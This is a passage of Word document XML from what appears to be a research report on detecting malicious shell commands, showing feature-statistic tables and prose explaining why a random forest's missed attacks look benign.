              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>position</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>special_ratio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.138</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.203</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.143</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−0.84</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−0.07</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_abs_paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.130</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.851</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.091</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−0.83</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.05</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_shell_bin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.305</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.008</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−0.66</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−0.03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_redirect_out</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.048</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.391</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.058</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−0.55</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−0.03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>max_token_len</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>11.55</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>17.76</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>11.68</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−0.46</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−0.02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_dev_null</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.182</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−0.46</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_sensitive_paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.029</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.339</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−0.45</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>digit_ratio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.030</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.080</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>−0.40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>On a scale where the caught attacks sit at 1, RF's missed attacks score between</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>−0.07 and +0.16</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on all eight — they are at the benign end of every one of</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>them. The point is not that the misses are literally indistinguishable from</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">benign traffic; on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_abs_paths</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_sensitive_paths</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>digit_ratio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> they do</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>sit slightly above the benign mean. It is that the margin above benign is a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>few percent of the distance to a typical caught attack. **Not one of the 207</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>missed attacks contains a shell binary.** These are not attacks the model</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>failed to recognise; they are attacks that, in the 43-dimensional space the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>model is given, are located inside the benign cloud.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Two controls confirm the reading. First, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>none</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of the 207 missed strings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>(nor any of Dataset 2's 145) appears anywhere in the benign training rows, so</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>this is not a duplicate-label artefact — the shape-grouped split guarantees</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>these are structurally novel commands. Second, the length statistics invert</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>between corpora exactly as Chapter 5.2 predicts they must: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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>missed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>caught</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>benign</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Dataset 1 mean </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>len_chars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>38.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
